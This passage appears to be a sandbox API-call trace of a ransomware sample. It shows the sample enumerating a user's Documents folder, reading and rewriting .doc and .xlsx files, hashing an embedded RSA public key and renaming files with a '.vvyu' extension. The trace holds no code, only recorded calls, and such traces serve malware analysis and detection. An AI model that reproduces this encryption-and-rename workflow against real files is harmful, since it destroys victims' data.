dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0186.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0186.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0186.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0186.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0186.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0186.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0186.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb40 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38838 | out: hHeap=0x6a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0186.457] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x8506, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x8506, lpOverlapped=0x0) returned 1 [0186.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0186.458] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x850b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.459] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0186.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0186.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0186.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0186.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0186.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.478] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0186.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0186.478] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0186.478] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0186.478] CloseHandle (hObject=0x584) returned 1 [0186.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0186.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0186.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0186.480] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\YrqWFs6aPMPbYVu.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\yrqwfs6apmpbyvu.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\YrqWFs6aPMPbYVu.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\yrqwfs6apmpbyvu.doc.vvyu")) returned 1 [0186.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.482] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0186.505] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a382a0, ftCreationTime.dwHighDateTime=0x1d8973c, ftLastAccessTime.dwLowDateTime=0x8bbd6b30, ftLastAccessTime.dwHighDateTime=0x1d8a280, ftLastWriteTime.dwLowDateTime=0x8bbd6b30, ftLastWriteTime.dwHighDateTime=0x1d8a280, nFileSizeHigh=0x0, nFileSizeLow=0x781c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_n6R.xlsx", cAlternateFileName="Y_N6R~1.XLS")) returned 1 [0186.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38838 [0186.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0186.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38838 | out: hHeap=0x6a0000) returned 1 [0186.505] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\y_n6R.xlsx") returned=".xlsx" [0186.522] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y_n6R.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\y_n6r.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0186.524] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=30748) returned 1 [0186.525] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0186.527] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x77f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.527] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0186.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.548] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.548] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x781c, lpOverlapped=0x0) returned 1 [0186.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0186.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.549] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0186.551] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0186.551] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0186.551] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0186.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0186.552] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0186.552] GetLastError () returned 0x0 [0186.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.552] GetLastError () returned 0x0 [0186.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.553] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0186.553] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0186.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0186.553] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0186.553] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0186.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.553] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0186.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7820) returned 0x2d43778 [0186.554] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0186.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38838 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38880 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb40 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0186.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0186.556] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0186.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0186.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb40 | out: hHeap=0x6a0000) returned 1 [0186.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0186.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb40 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4eae0 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0186.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb40 | out: hHeap=0x6a0000) returned 1 [0186.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0186.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0186.559] GetCurrentThreadId () returned 0x264 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37498 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.559] GetCurrentThreadId () returned 0x264 [0186.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0186.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0186.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb40 [0186.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0186.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0186.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 